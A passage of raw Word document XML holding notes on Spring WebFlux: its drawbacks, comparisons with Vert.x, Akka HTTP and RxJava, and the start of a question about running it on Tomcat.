          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> paradigm to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> one might require significant retraining for developers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F36C9A"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2. Not Always the Right Fit for Simple Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A99FAF4"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Overkill for Simple Use Cases</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: For simpler, traditional applications that do not require high concurrency or real-time processing, using WebFlux may introduce unnecessary complexity. Spring WebFlux shines in highly concurrent, event-driven systems, but for many standard applications, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> might be a simpler choice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603D4685"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3. Debugging and Tracing Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C73B07"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Asynchronous Debugging</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Debugging and tracing issues in reactive, asynchronous code can be more difficult than in imperative code. Tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread dumps</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> might not be as effective, and the callback hell pattern might make it harder to identify where issues arise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3045CC"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tack Traces</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When working with backpressure, async pipelines, or long chains of transformations, error stack traces can become more difficult to interpret, especially for developers unfamiliar with reactive programming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F27D2C"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4. Limited Support for Blocking Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B8E790"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Blocking Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: In Spring WebFlux, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking calls</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., traditional database calls, file I/O) can significantly degrade performance and negate the benefits of the non-blocking architecture. While WebFlux provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>mechanisms like subscribeOn and publishOn to shift blocking tasks to other threads, managing blocking operations is more cumbersome compared to other reactive systems that natively handle I/O operations in a more non-blocking way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A984C57"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5. Overhead for Small, Simple Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB574F5"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Overhead for Microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: WebFlux and reactive programming introduce extra complexity in microservice-based applications. In cases where simple synchronous calls are enough, using WebFlux could lead to unnecessary overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F549C31"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HTTP Server Overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: While WebFlux supports both blocking and non-blocking modes, the internal handling of requests in a non-blocking way can introduce some overhead, especially for applications that don’t heavily leverage asynchronous I/O.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF8DEB0"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6. Limited to Java Ecosystem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2583EC71"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Java-Centric</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring WebFlux is primarily designed for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java ecosystem</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which can be a limitation if you want a cross-platform solution. For polyglot environments or mixed language systems, other frameworks like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vert.x</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> may be more attractive due to their support for multiple programming languages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5112711C"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Pros and Cons Compared to Other Reactive Frameworks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8A12A4"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Spring WebFlux vs. Vert.x:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFA04C2"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Pros</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34953E86"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pring integration</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a major advantage for teams already using the Spring ecosystem. It simplifies development when integrating with existing Spring components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8C6F6C"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Declarative programming model</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a familiar annotation-based approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129B6CC9"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ons</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA919BB"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Vert.x might offer better </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>raw performance</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scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in certain scenarios due to its more lightweight, event-loop architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454D1C69"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Vert.x can also handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with minimal resources due to its non-blocking, event-driven model, whereas Spring WebFlux can incur some overhead because of the richer abstraction layers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A47BD30"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Spring WebFlux vs. Akka HTTP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D31BA7E"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Pros</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CC6EBC"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xml:space="preserve"> integrates seamlessly into the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring ecosystem</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is easier to set up for developers already familiar with Spring's conventions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C0D89E"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Akka HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is more suited for distributed systems, and Spring WebFlux might feel more appropriate for traditional </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>web applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or simple APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494319B0"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ons</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3D4B2E"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Akka HTTP's </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>actor model</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be more efficient for large-scale, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distributed systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, especially when handling high levels of concurrency with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>low-latency requirements</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. For reactive systems that rely on complex event-driven architectures, Akka may outperform Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007A002D"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Spring WebFlux vs. RxJava:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6365775E"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Pros</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A133C1"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Spring WebFlux is built on </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is the reactive programming framework provided by Spring, whereas RxJava is often used separately. WebFlux provides a complete </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring ecosystem</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> stack for building web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314B59EB"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xml:space="preserve"> allows both functional and annotation-based routing, offering flexibility over RxJava's more functionally focused approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C547F1"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ons</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5565AB89" w14:textId="77777777" w:rsidR="00B506B2" w:rsidRPr="00B13F85" w:rsidRDefault="00B506B2"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xJava</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> offers more operator-rich APIs and is more mature as a standalone reactive programming library, whereas Spring WebFlux is more </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>server-centric</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and may be less flexible for custom client-side logic or non-web-based reactive applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38728F72" w14:textId="77777777" w:rsidR="00B506B2" w:rsidRPr="00B13F85" w:rsidRDefault="00B506B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onclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF5D8BD" w14:textId="77777777" w:rsidR="00B506B2" w:rsidRPr="00B13F85" w:rsidRDefault="00B506B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xml:space="preserve"> is an excellent choice for reactive, web-based applications within the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring ecosystem</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, offering flexibility, scalability, and seamless integration with other Spring components. However, for simpler applications, debugging challenges, and situations requiring extreme low-latency handling, frameworks like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vert.x</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Akka HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> may provide better performance and lower complexity. It all depends on your application's requirements, team expertise, and the existing tech stack you're working with.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4370D1C8"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AA7C6D1">
          <v:rect id="_x0000_i2335" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2CC783" w14:textId="7FE58C3D"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32" w:name="_Toc196308012"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can Spring WebFlux be used in a traditional servlet container like Tomcat</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="532"/>
    </w:p>
    <w:p w14:paraId="24BEC34E" w14:textId="566EE933" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7F"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Yes, Spring WebFlux can run on a traditional servlet container like Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, but with an important distinction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4557599B" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7F"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Supported Mode on Tomcat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43157A15" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7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 xml:space="preserve">Spring WebFlux </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can run on Tomcat</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only in "servlet 3.1+ non-blocking I/O mode"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F94B40" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7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t </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>does not use the traditional Servlet API (Spring MVC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
